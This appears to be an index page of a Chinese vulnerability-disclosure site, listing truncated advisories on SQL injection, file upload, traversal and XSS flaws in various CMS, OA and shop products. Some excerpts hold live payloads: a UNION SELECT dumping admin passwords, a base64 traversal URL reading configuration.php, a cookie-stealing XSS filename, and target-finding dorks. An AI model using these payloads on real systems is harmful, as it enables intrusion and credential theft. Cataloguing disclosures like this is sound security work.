用友某软件存在通用XXE漏洞

简要描述： 详细说明： 1.民生证券 http://.../uapws/ 抓包 POST /uapws/soapFormat.ajax HTTP/1.1 Host: ... User-Agent: Mozilla/5.0 Windows NT 6.1; rv:43.0 Gecko/20100101 Firefox/43.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3...

maticsoft Shop商城系统 regionhandle.aspx 参数ParentId SQL注入漏洞

动软商城系统是一套集CMS资讯+独立商城+微信商城+手机APP+SNS用户社区于一体的全新电商营销解决方案。主要为企业树立企业品牌形象，实现独立网络推广，充分利用网站SEO、微博、APP，微信等移动客户端多渠道网络营销手段，为您搭建一个全新的营销渠道。 官方主页： http://www.maticsoft.com/ Google Dork：MaticsoftFK 0x02 漏洞细节 通用注入 http://shop1.maticsoft.cn/regionhandle.aspx 页面中 ParentId 过滤不严，造成post注入 sqlmap过程： Place: POST...

4a网络教学平台relatedMaterial.jsp resId参数SQL注入漏洞

4a网络教学平台relatedMaterial.jsp resId参数SQL注入漏洞 relatedMaterial.jsp中的resid参数存在注入 可以用sqlmap直接跑。 这个是正常的。 这个是不正常的。我也是醉了。...

Joomla 组件EQ Event Calendar 参数id SQL注入漏洞

No description provided by source...

CSDJCMS V4 reg.php 参数username SQL注入漏洞

漏洞文件app/controllers/user/reg.php public function check $username = $this-security-xssclean$this-input-getpost'username', TRUE; //username $sqlu="SELECT csid FROM ".CSSqlPrefix."user where csname='".$username."'"; $row=$this-CsdjDB-getall$sqlu; if!$row echo 'no'; else echo 'ok';...

jeecms V2.4.2 ArtiSearch.do 远程命令执行漏洞

0x01 框架概述 江西金磊科技发展有限公司（以下简称金磊科技）成立于2003年，旗下产品JEECMS内容管理系统是国内java开源CMS行业知名度最高、用户量最大的站群管理系统。金磊科技是一家专注java WEB应用软件研发高新技术企业。Jeecms是基于java技术研发的站群管理系统，稳定、安全、高效、跨平台、 无限扩展是jeecms 的优点，系统支持mysql、oracle、sqlserver、db2等主流 数据库。 主页：http://www.jeecms.com 0x02 漏洞细节 谷歌搜索：inurl:jeecms/ArtiSearch.do 涉及大量案例 漏洞证明：...

泛微OA系统第三方组件jqueryFileTree不安全配置导致目录遍历

可遍历至操作系统任意目录，只能查看文件名及大小等信息，但是遍历整个oa的目录，收获还是很大的，比如log文件、文本文件等都会对渗透有很大的帮助。有些log文件会包含数据库操作记录，比如更改oa登录密码等，如此便可不费吹灰之力登录oa。 文件：/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp jqueryFileTree在很多通用软件中用的还比较多，该文件接受dir参数来浏览指定的目录，部分代码： / jQuery File Tree JSP Connector Version 1.0 Copyright 200...

ecshop商城系统 delete_cart_goods.php文件SQL注入漏洞

0x01 框架介绍 商城网站建设-damall多功能商城建站系统,支持B2C2C,O2O模式...DaMall商城建站系统采用强劲的.NET企业级平台研发,可兼容多行业、多模式的业务特点以及扩展需求。 官方主页：http://www.bg68.com 0x02 漏洞细节 漏洞页面： http://mall.bg68.com/httphandler/getdata.ashx 参数brandid 部分用户案例： http://mall.hicay.com/httphandler/getdata.ashx http://w16.cxecs.com/httphandler/getdata.ash...

正方协同办公系统/zfoa/gwxxbviewhtml.do任意文件下载漏洞

0x01 系统介绍 正方协同办公系统的设计目标是帮助各部门快速构建起一个安全、可靠、易用的文档一体化办公环境，实现公文处理的自动化，同时作为内部通讯和信息共享的平台。 系统的特点如下： （1）简单易用：实现快速部署，轻松办公 符合日常办公习惯的界面和操作，通过简单的使用培训，使用人员即可了解系统中的相关办公设置，并可应用系统进行办公。 （2）灵活的自定义功能，满足个性与变化的需求 组织机构、表单格式、工作流程、访问权限、打印格式、统计等全面提供自定义，能够很好的满足各单位现在和未来的办公自动化需求。 （3）多层次的安全设计，为办公自动化提供保障...

Shop7z /orderpro_del.asp id参数SQL注入漏洞

0x01 框架概述 相关厂商： shop7z 公开时间： 2015-04-23 官方主页: http://www.shop7z.com/ Shop7z网上购物系统是国内优秀的网上开店软件,模板新颖独特,功能强大,可以快速建立自己的网上商城。 0x02 漏洞细节 漏洞文件：orderprodel.asp 问题参数：id TEST:http://www.125309.com/orderprodel.asp?id= sqlmap证明： Place: GET Parameter: id Type: boolean-based blind Title: Microsoft Access...

用友FE协作办公系统 /common/codeMoreWidget.jsp SQL注入漏洞

0x01 框架介绍 用友用友FE协作办公系统是一款OA办公自动化软件，算是一款平台型的办公自动化软件。通过整合多种网络化、低成本营销手段和沟通方式，帮助企业建立与客户之间通畅的交流平台，全方位管理客户资源、提升客户价值、制定科学销售指标、监控项目进程、评估业务员绩效，以增强内部协同，合理调配企业资源。 官方主页：http://www.yonyou.com/ 0x02 漏洞细节 用友FE协作办公系统某处过滤不严，导致SQL注入漏洞 注入链接： /common/codeMoreWidget.jsp?code= 案例：...

新云cms建站系统showkbxx.asp文件id参数SQL注入漏洞

No description provided by source...

StrongSoft灾害预警系统 /public/DataAccess/GeneralModule/GetFeatureInfo.ashx SQL注入漏洞

注入链接：/public/DataAccess/GeneralModule/GetFeatureInfo.ashx 注入参数：ID 【获取数据库版本】 SqlKey=MapSGetReseFeatureInfoZWP&STCD=rs048' and 1=convertint,@@version and 'e'='e&dateForAjax=659 【管理员账号密码】...

ThinkSNS /apps/page/Lib/Action/DiyAction.class.php SQL注入漏洞

No description provided by source...

ThinkSNS apps/event/Lib/Action/IndexAction.class.php SQL注入漏洞

No description provided by source...

ThinkSNS /thinksns/apps/weiba/Lib/Widget/WeibaReplyWidget/WeibaReplyWidget.class.php 任意文件包含漏洞

No description provided by source...

kingdee /kingdee/flow_performance/下6个文件存在SQL盲注漏洞

No description provided by source...

ThinkSNS \apps\public\Lib\Action\TestAction.class.php SQL注入漏洞

No description provided by source...

jeecms在后台用户中心存在存储性XSS漏洞

No description provided by source...

eduwind在线教育平台course/index/index模块categoryId参数SQL注入漏洞

No description provided by source...

ShyPost企业建站系统SQL注射漏洞

出错文件：CompVisualizeBig.asp set rs=server.createobject"adodb.recordset" sql="select from CompVisualize order by id desc" rs.open sql,conn,1,1 dim MaPerPage MaPerPage=9 dim text,checkpage text="0123456789" Rs.PageSize=MaPerPage for i=1 to lenrequest"page" checkpage=instr1,text,midrequest"page",i,1 i...

泛微 OA sysinterface/codeEdit.jsp 页面任意文件上传

0x01 漏洞概述 相关厂商： 泛微OA 官方主页： http://www.weaver.com.cn/ 公开时间： 2015-11-25 漏洞类型： 非授权访问/权限绕过 无需登录上传文件。 http://localhost:8088/sysinterface/codeEdit.jsp?filename=5308.java&filetype=java filename为文件名称 为空时会自动创建。 0x02 漏洞利用 代码详情 String fileid = "Ewv"; String readonly = ""; boolean isCreate = false;...

Proxychains-ng 'LD_PRELOAD' 任意代码执行漏洞

No description provided by source...

Symphony CMS 跨站脚本漏洞

No description provided by source...

ezOFFICE在/work_flow/formStartJSPUpload.jsp等7处存在任意文件上传漏洞

No description provided by source...

destoon waf 绕过漏洞

No description provided by source...

ThinkSNS index.php sql注入漏洞

No description provided by source...

JCMS在/jcms/interface/user/out_userinfo.jsp存在信息泄漏漏洞

No description provided by source...

ThinkSNS \apps\weiba\Lib\Action\GroupAction.class.php SQL注入漏洞

No description provided by source...

KeePass Password Safe Classic 1.29 - Crash

1 . run python code : python crash.py 2 . open “KeePass” 3 . File — New Create New Password Database 4 . File — Import — CSV File… 5 . open r3z4.csv 6 . Right Click on “R3Z4” username and edit 7 . Crashed crash.py: !/usr/bin/env python hdr = '"' start syntax hcr = "R3Z4" user oth = ',"' user oth2...

FanweO2O系统/biz.php处参数field_name存在SQL盲注漏洞

No description provided by source...

node.js的ws模块存在远程内存泄露漏洞

近日，在允许用户通过简单地发送ping数据帧，来分配内存的ws模块中发现存在着漏洞。该漏洞会拒绝用户发送数据的请求，使用户发送ping数据帧功能失效，在此之前，还会加大数据帧的负载。 实际上，这就是漏洞的具体表现。但在模块中，ws通常将我们所要传入内存的所有数据进行相应的转换，这就是漏洞之所在。我们对所要发送数据的类型都没做任何检查。当你在node.js中需要存储一个数字时，该漏洞就会自动给数字分配一个存储大量字节的字符串空间，从而加大内存的负载。 var x = new Buffer100; // vs var x = new Buffer'100';...

WP 插件 NEX-Forms Lite 2.1.0 XSS 漏洞

1.漏洞分析 由于下不到2.1.0的源代码，只能根据漏洞描述以及3.4版本的代码进行推敲。 先看wp-admin/admin-ajax.php文件 wp-admin/admin-ajax.php:77 php if isuserloggedin / Fires authenticated AJAX actions for logged-in users. The dynamic portion of the hook name, $REQUEST'action', refers to the name of the AJAX action callback being fired...

ThinkSNS /thinksns/apps/w3g/Lib/Action/PublicAction.class.php 任意文件包含漏洞

No description provided by source...

JCMS政府信息公开系统在/lm/front/reg_2.jsp存在本地文件包含漏洞

No description provided by source...

Joomla! 3.4.6-3.4.x 目录遍历漏洞

本地包含： http://www.site.com/components/comdocman/dl2.php?archive=0&file=LDF 先通过本地包含漏洞查看物理路径，然后在configuration.php 数据库配置文件中，使用base64目录遍历payload 如： http://www.site.com/components/comdocman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==...

kingdee /kingdee/portal/portlet/document/set.jsp等99处参数portal_id SQL盲注漏洞

No description provided by source...

用友TurboCRM /ajax/getemaildata.php 任意文件读取漏洞

漏洞信息： 用友TurboCRM客户关系管理系统是一套基于B/S架构、互联网模式应用普及的信息化趋势，专为中小企业提供包括客户管理、销售管理、项目管理等应用的在线CRM。 用友TurboCRM /ajax/getemaildata.php 存在任意文件读取漏洞导致敏感信息泄漏。 漏洞分析： 漏洞存在于/ajax/getemaildata.php filePath参数未有效过滤，导致可以使用 ../../ 越权读取任意文件。 可使用以下URl测试读取系统文件：...

正方教务管理系统(2006)账号密码信息泄露漏洞

可以通过正方教务管理系统的C/S客户端进行任意账号的登录操作，服务器会返回其账号极其加密后的密码，通过简单的解密即可任意登陆系统，使系统处于危险之中。具体如下所述： 1、可以通过旧版的C/S客户端登陆系统，初始化界面，这个时候系统已经登陆到数据库中了。然后任意输入一个账号密码，单击登陆按钮，立即采用抓包工具抓包，可以发现系统已经向服务器发送了一个查询的SQL语句 2、这时候因为随意输入的密码，所以会提示您密码输入错误！ 3但是....令人发指的是，抓包发现已经把账号密码发到自己的客户端上来了，截图一枚，这里的密码虽然经过加密，但是加密的方式实在是想让我唾骂一把！很简单，大家自己看着办吧！...

Nongyou 农业监管系统 WebDefault.aspx SQL注入漏洞

No description provided by source...

Shop7z order_checknoprint.asp SQL注入漏洞

/orderchecknoprint.asp?checkno=1&id=1 UNION SELECT 1,2,'!!!'+suser+'!!!',4,'@'+spwd+'@',6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 from admin...

Ubuntu 14.04 LTS, 15.10 overlayfs - Local Root Exploit

No description provided by source. / just another overlayfs exploit, works on kernels before 2015-12-26 Exploit Title: overlayfs local root Date: 2016-01-05 Exploit Author: rebel Version: Ubuntu 14.04 LTS, 15.10 and more Tested on: Ubuntu 14.04 LTS, 15.10 CVE : CVE-2015-8660 blah@ubuntu:$ id...

FTPShell Client 5.24 - Add to Favorites Buffer Overflow

No description provided by source...

WordPress AzonPop插件1.0.0版本在/wp-content/plugins/AzonPop/files/view/showpopup.php存在SQL注入漏洞

No description provided by source...

WP 插件 Easy Poll 1.1.3 XSS 漏洞

No description provided by source...

jeecms前台在/member/o_upload_image.jspx存在文件上传漏洞

No description provided by source...

Fanwe众筹系统在/app/Lib/modules/accountModule.class.php存在SQL注入漏洞

No description provided by source...

CSDJCMS系统 app/controllers/user/pay.php SQL注入漏洞

No description provided by source...

AnyMacro G7 版本存储型XSS

简要描述： RT 详细说明： 邮件系统的网盘功能-文件中心-上传文件-共享文件功能存在存储型XSS漏洞 首先，上传一个文件，修改文件名为alertdocument.cookie.php 接着共享该文件，点击该链接即可触发该漏洞 漏洞证明： 邮件系统的网盘功能-文件中心-上传文件-共享文件功能存在存储型XSS漏洞 首先，上传一个文件，修改文件名为alertdocument.cookie.php 接着共享该文件，点击该链接即可触发该漏洞...

AspCMS V2.5.2 /aspcms252.asp 数据库泄露漏洞

0x01 框架介绍 ASPCMS是基于ASP+Accesssql2000开发的网站内容管理系统,提供了简介类模块,新闻类模块,产品类模块,图片类模块,下载类模块。 官方主页： http://www.aspcms.com/forum.php 0x02 漏洞细节 ASPCMS最新版2.5.2以及ASPCMS2.3.x都存在这个问题，应该是通杀 在ASPCMS2.3.x中，ASPCMS的数据库在/data/目录下，为了防止数据库被下载，把数据库文件data.mdb重新命名为data.asp，由于设置不当，使用%23编码即可绕过访问，导致信息泄漏：...